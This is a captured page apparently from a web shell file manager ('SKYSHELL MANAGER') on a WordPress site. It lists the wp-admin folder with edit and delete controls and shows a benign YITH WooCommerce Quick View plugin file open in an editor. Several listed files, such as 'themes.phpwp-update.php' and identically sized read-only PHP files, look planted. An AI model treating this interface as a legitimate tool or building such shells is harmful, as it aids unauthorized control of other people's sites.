📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: init.php
<?php /** * Plugin Name: YITH WooCommerce Quick View * Plugin URI: https://yithemes.com/themes/plugins/yith-woocommerce-quick-view * Description: YITH WooCommerce Quick View allows your users to have a quick look about products. * Version: 1.2.2 * Author: YITHEMES * Author URI: https://yithemes.com/ * Text Domain: yith-woocommerce-quick-view * Domain Path: /languages/ * * @author Yithemes * @package YITH WooCommerce Quick View * @version 1.2.2 */ /* Copyright 2015 Your Inspiration Themes (email : plugins@yithemes.com) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License, version 2, as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ if ( !defined( 'ABSPATH' ) ) { exit; } // Exit if accessed directly if ( ! function_exists( 'is_plugin_active' ) ) { require_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } function yith_wcqv_install_woocommerce_admin_notice() { ?> <div class="error"> <p><?php _e( 'YITH WooCommerce Quick View is enabled but not effective. It requires WooCommerce in order to work.', 'yith-woocommerce-quick-view' ); ?></p> </div> <?php } function yith_wcqv_install_free_admin_notice() { ?> <div class="error"> <p><?php _e( 'You can\'t activate the free version of YITH WooCommerce Quick View while you are using the premium one.', 'yith-woocommerce-quick-view' ); ?></p> </div> <?php } if ( ! function_exists( 'yith_plugin_registration_hook' ) ) { require_once 'plugin-fw/yit-plugin-registration-hook.php'; } register_activation_hook( __FILE__, 'yith_plugin_registration_hook' ); if ( ! defined( 'YITH_WCQV_VERSION' ) ){ define( 'YITH_WCQV_VERSION', '1.2.2' ); } if ( ! defined( 'YITH_WCQV_FREE_INIT' ) ) { define( 'YITH_WCQV_FREE_INIT', plugin_basename( __FILE__ ) ); } if ( ! defined( 'YITH_WCQV' ) ) { define( 'YITH_WCQV', true ); } if ( ! defined( 'YITH_WCQV_FILE' ) ) { define( 'YITH_WCQV_FILE', __FILE__ ); } if ( ! defined( 'YITH_WCQV_URL' ) ) { define( 'YITH_WCQV_URL', plugin_dir_url( __FILE__ ) ); } if ( ! defined( 'YITH_WCQV_DIR' ) ) { define( 'YITH_WCQV_DIR', plugin_dir_path( __FILE__ ) ); } if ( ! defined( 'YITH_WCQV_TEMPLATE_PATH' ) ) { define( 'YITH_WCQV_TEMPLATE_PATH', YITH_WCQV_DIR . 'templates' ); } if ( ! defined( 'YITH_WCQV_ASSETS_URL' ) ) { define( 'YITH_WCQV_ASSETS_URL', YITH_WCQV_URL . 'assets' ); } /* Plugin Framework Version Check */ if( ! function_exists( 'yit_maybe_plugin_fw_loader' ) && file_exists( YITH_WCQV_DIR . 'plugin-fw/init.php' ) ) { require_once( YITH_WCQV_DIR . 'plugin-fw/init.php' ); } yit_maybe_plugin_fw_loader( YITH_WCQV_DIR ); function yith_wcqv_init() { load_plugin_textdomain( 'yith-woocommerce-quick-view', false, dirname( plugin_basename( __FILE__ ) ). '/languages/' ); // Load required classes and functions require_once('includes/class.yith-wcqv.php'); // Let's start the game! YITH_WCQV(); } add_action( 'yith_wcqv_init', 'yith_wcqv_init' ); function yith_wcqv_install() { if ( ! function_exists( 'WC' ) ) { add_action( 'admin_notices', 'yith_wcqv_install_woocommerce_admin_notice' ); } elseif ( defined( 'YITH_WCQV_PREMIUM' ) ) { add_action( 'admin_notices', 'yith_wcqv_install_free_admin_notice' ); deactivate_plugins( plugin_basename( __FILE__ ) ); } else { do_action( 'yith_wcqv_init' ); } } add_action( 'plugins_loaded', 'yith_wcqv_install', 11 );
Save